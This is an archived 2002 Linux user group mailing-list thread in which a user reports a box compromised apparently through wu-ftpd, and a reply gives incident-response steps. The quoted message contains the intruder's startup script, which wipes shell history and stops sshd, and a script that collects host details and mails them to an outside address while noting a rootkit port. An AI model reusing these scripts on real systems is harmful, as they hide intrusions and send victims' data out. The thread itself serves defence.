[lug] i got hacked

Scott A. Herod herod at interact-tv.com
Thu Apr 18 15:54:12 MDT 2002 

Document the intrusion as much as possible.

Unplug the network cable.
Wipe it.
Reload everything.
Set up an iptable or ipchains firewall.
Run said firewall.
Plug the network cable back in.

Contact the FBI.  ( Scary option.  I'd be afraid they might
charge you with destruction of evidence for wiping the box.
That is if they even care to respond. )

Seriously, I have an ipchains firewall on the ppp port on my
home machine.  I see scans within 5 minutes of dialing up
my ISP.  ( I tend to run several services for other machines
on my home network but those all talk through eth0.  Nothing
but udp nameservice and auth is allowed in though my ppp
interface. )

Scott

j davis wrote:
> 
> i have a box at a place i do contract work about 2 days a month.
> today i could not ssh to it. so iwent on site and discoverd i got
> hacked...like a dummy i didnt have tcp wrappers on or a firewall . i think
> they exploited wu-ftpd
> ..i use redhat 7.1 with wu-ftpd 2.6.1-20...i havent got around to upgrading
> yet.
> anyway here is what i found in /etc/rc3.d/S52remote
> 
> #!/bin/sh
> 
> rm -rf /root/.bash_history
> ln -s /dev/null /root/.bash_history
> 
> cd /dev
> ./ryz -f ./s
> /etc/rc.d/init.d/sshd stop
> cd /
> 
> /usr/bin/trimite
> 
> then here is /usr/bin/trimite
> 
> #!/bin/sh
> 
> echo "* Info : $(uname -a)" >> /tmp/info
> echo "* Hostname : $(hostname -f)" >> /tmp/info
> echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info
> echo "* Uptime : $(uptime)" >> /tmp/info
> echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info
> echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info
> echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info
> echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info
> echo "* Spatiu Liber: $(df -h)" >> /tmp/info
> echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info
> echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
> echo "* Portul rootkitului este 25897" >> /tmp/info
> cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com
> rm -f /tmp/info
> 
> so, netstat says i have something listening on 25897...what should i do?!
> never benn hacked before....i already turned off ftp and turned on tcp
> wrappers.
> 
> help please
> jd
> 
> _________________________________________________________________
> Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp.
> 
> _______________________________________________
> Web Page:  http://lug.boulder.co.us
> Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug

More information about the LUG mailing list